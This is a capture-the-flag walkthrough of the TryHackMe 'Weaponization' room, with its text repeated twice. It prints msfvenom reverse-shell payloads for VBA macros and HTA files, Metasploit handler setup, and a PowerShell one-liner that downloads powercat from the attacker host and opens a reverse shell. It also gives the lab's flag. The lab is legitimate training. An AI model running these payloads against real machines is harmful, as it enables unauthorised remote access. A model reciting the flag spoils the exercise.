Weaponization Banner

Weaponization Logo

Weaponization

This guide contains the answer and steps necessary to get to them for the Weaponization room.

Windows Scripting Host - WSH
An HTML Application - HTA
Visual Basic for Application - VBA
PowerShell - PSH
Delivery Techniques
Practice Arena

Windows Scripting Host - WSH

Try to replace the calc.exe binary to execute cmd.exe within the Windows machine.

I tried the message box using cscript which seemed to work.

When trying the open cmd.exe with the vbs file, I ran into an issue where it just wouldn't open a command prompt. So I had to modify the code slightly for it to work.
cmd
```
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
```
It also worked when saving the vbs file as a text file and using the /e argument.
cmd
```
cscript /e:VBScript c:\Users\thm\Desktop\payload.txt
```
Click for answer
No Answer Needed

An HTML Application - HTA

Now, apply what we discussed to receive a reverse connection using the user simulation machine in the Practice Arena task.

This task can also be done with the regulat Windows 10 machine. Saves me from terminating and started a new machine. First we open MetaSploit and the required module.
cmd
```
use exploit/windows/misc/hta_server
```
Then we set all required options.
cmd
```
set LHOST 10.18.78.136
set LPORT 1337
set payload windows/meterpreter/reverse_tcp
exploit
```
As seen in the image above, we managed to get a reverse connection back.

Click for answer
No Answer Needed

Visual Basic for Application - VBA

Now replicate and apply what we discussed to get a reverse shell!

First I had to create a vba payload using msfvenom.
cmd
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f vba 
```
Now I could copy this macro into a Word document on the target machine.

Save it as a word 97 document so the macros are enabled. Close Word.

Instead of using nc I used Metasploit as a handler.
cmd
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.18.78.136
set LPORT 1337
run
```
Now we can open the newly created Word document with our payload inside.

Click for answer
No Answer Needed

PowerShell - PSH

Apply what you learned in this task. In the next task, we will discuss Command and Control frameworks!

First thing to do is to download the Powercat tool from Github.
cmd
```
git clone https://github.com/besimorhino/powercat.git
```
Next we set up a server in the Powercat folder and a listener on the specified port.
cmd
```
cd Weaponization
python3 -m http.server 8080 

sudo nc -nlvp 1337
```
Then we can download and execute Powercat from our target machine using PowerShell.
cmd
```
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.18.78.136:8080/powercat.ps1');powercat -c 10.18.78.136 -p 1337 -e cmd"
```
Click for answer
No Answer Needed

Delivery Techniques

Which method is used to distribute payloads to a victim at social events?

This is mentioned in the text. Usually a physical device would be used as this can be handed over.

Click for answer
USB Delivery

Practice Arena

In this task we will use what we have learned and try to gain access to the target machine with one (or more) of the methods.

What is the flag? Hint: Check the user desktop folder for the flag!

For this task I decided to use the HTML Application method. First step is to create a payload using msfvenom.
cmd
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f hta-psh -o letmein.hta
```
Then we need to setup a listener, which we can do with MetaSploit. Don't forget to set the required options.
cmd
```
use exploit/multi/handler

set LHOST 10.18.78.136
set LPORT 1337
set payload windows/meterpreter/reverse_tcp
```
Lastly, we need to setup a server in the same folder as the payload.
cmd
```
python3 -m http.server 8080
```
Now we can navigate to the web application and supply the url provided by the MetaSploit handler.

We can see we successfully captured the reverse connection in MetaSploit. Although maybe not necessary when using this method, I also wanted to migrate our process to another. For this we can use the following command in MetaSploit:
cmd
```
run post/windows/manage/migrate
```
Finally, we can look for the flag on the system.

Click for answer
THM{b4dbc2f16afdfe9579030a929b799719}

Table of contents

Windows Scripting Host - WSH

Try to replace the calc.exe binary to execute cmd.exe within the Windows machine.

I tried the message box using cscript which seemed to work.

Hello

When trying the open cmd.exe with the vbs file, I ran into an issue where it just wouldn't open a command prompt. So I had to modify the code slightly for it to work.

cmd

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

CMB VBS

It also worked when saving the vbs file as a text file and using the /e argument.

cmd

cscript /e:VBScript c:\Users\thm\Desktop\payload.txt

CMD TXT

Click for answer
No Answer Needed

An HTML Application - HTA

Now, apply what we discussed to receive a reverse connection using the user simulation machine in the Practice Arena task.

This task can also be done with the regulat Windows 10 machine. Saves me from terminating and started a new machine. First we open MetaSploit and the required module.

cmd

use exploit/windows/misc/hta_server

Then we set all required options.

cmd

set LHOST 10.18.78.136
set LPORT 1337
set payload windows/meterpreter/reverse_tcp
exploit

Metasploit Module Run

As seen in the image above, we managed to get a reverse connection back.

Click for answer
No Answer Needed

Visual Basic for Application - VBA

Now replicate and apply what we discussed to get a reverse shell!

First I had to create a vba payload using msfvenom.

cmd

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f vba

Now I could copy this macro into a Word document on the target machine.

Macro

Save it as a word 97 document so the macros are enabled. Close Word.

Instead of using nc I used Metasploit as a handler.

cmd

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.18.78.136
set LPORT 1337
run

Now we can open the newly created Word document with our payload inside.

Metasploit Run

Click for answer
No Answer Needed

PowerShell - PSH

Apply what you learned in this task. In the next task, we will discuss Command and Control frameworks!

First thing to do is to download the Powercat tool from Github.

cmd

git clone https://github.com/besimorhino/powercat.git

Git Clone

Next we set up a server in the Powercat folder and a listener on the specified port.

cmd

cd Weaponization
python3 -m http.server 8080 

sudo nc -nlvp 1337

Then we can download and execute Powercat from our target machine using PowerShell.

cmd

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.18.78.136:8080/powercat.ps1');powercat -c 10.18.78.136 -p 1337 -e cmd"

Powercat Reverse

Click for answer
No Answer Needed

Delivery Techniques

Which method is used to distribute payloads to a victim at social events?

This is mentioned in the text. Usually a physical device would be used as this can be handed over.

Click for answer
USB Delivery

Practice Arena

In this task we will use what we have learned and try to gain access to the target machine with one (or more) of the methods.

What is the flag? Hint: Check the user desktop folder for the flag!

For this task I decided to use the HTML Application method. First step is to create a payload using msfvenom.

cmd

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f hta-psh -o letmein.hta

Payload Creation

Then we need to setup a listener, which we can do with MetaSploit. Don't forget to set the required options.

cmd

use exploit/multi/handler

set LHOST 10.18.78.136
set LPORT 1337
set payload windows/meterpreter/reverse_tcp

Metasploit Handler

Lastly, we need to setup a server in the same folder as the payload.

cmd

python3 -m http.server 8080

Now we can navigate to the web application and supply the url provided by the MetaSploit handler.

Web Application

We can see we successfully captured the reverse connection in MetaSploit. Although maybe not necessary when using this method, I also wanted to migrate our process to another. For this we can use the following command in MetaSploit:

cmd

run post/windows/manage/migrate

Migrate Check

Finally, we can look for the flag on the system.

Flag

Click for answer
THM{b4dbc2f16afdfe9579030a929b799719}